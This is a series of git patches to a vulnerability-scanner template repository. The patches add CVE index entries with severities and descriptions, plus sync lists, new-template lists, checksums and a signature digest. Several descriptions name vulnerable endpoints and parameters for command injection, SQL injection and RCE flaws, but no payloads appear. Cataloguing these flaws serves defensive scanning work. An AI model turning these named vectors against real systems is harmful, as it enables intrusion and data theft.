{"ID":"CVE-2023-4168","Info":{"Name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","Severity":"high","Description":"Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4168.yaml"} {"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} @@ -2328,6 +2319,7 @@ {"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"} +{"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"} @@ -2387,6 +2379,7 @@ {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} +{"ID":"CVE-2024-21650","Info":{"Name":"XWiki \u003c 4.10.20 - Remote code execution","Severity":"critical","Description":"XWiki is vulnerable to a remote code execution (RCE) attack through its user registration feature. This issue allows an attacker to execute arbitrary code by crafting malicious payloads in the \"first name\" or \"last name\" fields during user registration. This impacts all installations that have user registration enabled for guests.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-21650.yaml"} {"ID":"CVE-2024-21683","Info":{"Name":"Atlassian Confluence Data Center and Server - Remote Code Execution","Severity":"high","Description":"Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-21683.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} {"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"} @@ -2424,6 +2417,7 @@ {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-29824","Info":{"Name":"Ivanti EPM - Remote Code Execution","Severity":"critical","Description":"An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2024/CVE-2024-29824.yaml"} +{"ID":"CVE-2024-29895","Info":{"Name":"Cacti cmd_realtime.php - Command Injection","Severity":"critical","Description":"Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-29895.yaml"} {"ID":"CVE-2024-29973","Info":{"Name":"Zyxel NAS326 Firmware \u003c V5.21(AAZF.17)C0 - Command Injection","Severity":"critical","Description":"The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.\n","Classification":{"CVSSScore":"9.88"}},"file_path":"http/cves/2024/CVE-2024-29973.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} @@ -2444,19 +2438,26 @@ {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-34982","Info":{"Name":"LyLme-Spage - Arbitary File Upload","Severity":"high","Description":"An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34982.yaml"} {"ID":"CVE-2024-3552","Info":{"Name":"Web Directory Free \u003c 1.7.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3552.yaml"} +{"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"} +{"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"} {"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} +{"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} +{"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} +{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} +{"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 2d5ebc9b40..6feb94634b 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -a0314be23fea3fd21e58a890fbcccb36 +bb5f402eb81b9390ee8af7f9d9b96bdf From 13eb6713a8ba8cd156c174064ec84f539cd5024f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:55:16 +0000 Subject: [PATCH 0686/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 819084256d..2110f05159 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' + - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' From 771a279146a27f82467c45f98567a6a08da5b8e2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:55:59 +0000 Subject: [PATCH 0687/1841] Auto Generated New Template Addition List [Thu Jun 27 15:55:59 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 02ac46b147..905aeaac91 100644 --- a/.new-additions +++ b/.new-additions @@ -3,5 +3,7 @@ http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml +http/exposures/configs/neo4j-neodash-config.yaml +http/technologies/neo4j-neodash-detect.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml From 393c3c90565d0e4c226441151022f266d036580f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:56:07 +0000 Subject: [PATCH 0688/1841] Auto Generated Templates Checksum [Thu Jun 27 15:56:07 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 43eab0da96..89cc36197e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:a82e81b521b8ef2fa309bb79b5e254703f900f50 -cves.json-checksum.txt:1a4855caa4afbcd48ef60adf60ca5639adb6634b +cves.json:0e1abd7e0878adfc9d44b61993564da40d25ffb4 +cves.json-checksum.txt:8adcdbf646b2e7a243ac4aeddcce3e475ea8a0ef dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -4870,6 +4870,7 @@ http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddb http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb9edef33 http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef +http/exposures/configs/neo4j-neodash-config.yaml:4397687c64ba935f38f2e0e078e1cd0f334d8b1b http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 http/exposures/configs/netrc.yaml:c59cb2322fce014ee30bd8446fab2815f0de548f http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d @@ -7075,6 +7076,7 @@ http/technologies/monstracms-detect.yaml:ceed5f23372e91f704f11a6a4db9b33340a8fb8 http/technologies/moveit-transfer-detect.yaml:2744d9bbad9ae50abef1c6523998f3b64c623268 http/technologies/mrtg-detect.yaml:1b41717cf1bb1618aa6f8a359593b98cb81f2ace http/technologies/nacos-version.yaml:46e9e392ebfe74702da3bf3f491e3487691d990e +http/technologies/neo4j-neodash-detect.yaml:c7ff92dcaacecd8008a2d2e84f0e50f50ac42add http/technologies/neos-detect.yaml:18e43d4fef8a3ce6458ddbbbfec4e6bdbdfac84e http/technologies/nethermind-server-detect.yaml:83b8aa8be46e98954ff916451eb045e8ffe9568b http/technologies/netsweeper-webadmin-detect.yaml:7975a266790de781015d82d29fe25d089ebbec50 @@ -8796,7 +8798,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4bdc96e32f749b705227c9d5299e7b5a5160d4f9 +templates-checksum.txt:ee1ea4bf7b8fc5e4e03c80864a6a0bcddeafb609 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1e1075ec8937d3f7d982550483bece132b2edb7e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:56:24 +0000 Subject: [PATCH 0689/1841] Auto Template Signing [Thu Jun 27 15:56:24 UTC 2024] :robot: --- http/cves/2024/CVE-2024-37881.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-37881.yaml b/http/cves/2024/CVE-2024-37881.yaml index 55ac7c9316..e663772da3 100644 --- a/http/cves/2024/CVE-2024-37881.yaml +++ b/http/cves/2024/CVE-2024-37881.yaml @@ -45,3 +45,4 @@ http: - type: kval kval: - location +# digest: 490a004630440220626c7d016013362ce47d6c7477d4bbe7bc2b275ec56e1b302cfb114913e049b002207d3e94531b207d8af527042a27217c6f956d64dfa972af1fa649a6535966385e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a54868893c4d171f9b081b3ebd1a37bbb12c4685 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:56:52 +0000 Subject: [PATCH 0690/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2110f05159..af96c6fc41 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,8 @@ on: - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/exposures/configs/neo4j-neodash-config.yaml' + - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' workflow_dispatch: From e98e7705da67410403e580a46fda3d1c7f26c522 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:57:06 +0000 Subject: [PATCH 0691/1841] Auto Generated New Template Addition List [Thu Jun 27 15:57:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 905aeaac91..ef30f10a86 100644 --- a/.new-additions +++ b/.new-additions @@ -7,3 +7,4 @@ http/exposures/configs/neo4j-neodash-config.yaml http/technologies/neo4j-neodash-detect.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml +http/vulnerabilities/other/bagisto-csti.yaml From 112caf261b4f64188102e5836ce0871e5d33ac37 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:57:11 +0000 Subject: [PATCH 0692/1841] Auto Generated Templates Checksum [Thu Jun 27 15:57:11 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 89cc36197e..f90136b00d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3453,7 +3453,7 @@ http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd -http/cves/2024/CVE-2024-37881.yaml:3b6f81c95055fda7681a473c61abef1e44f501f4 +http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 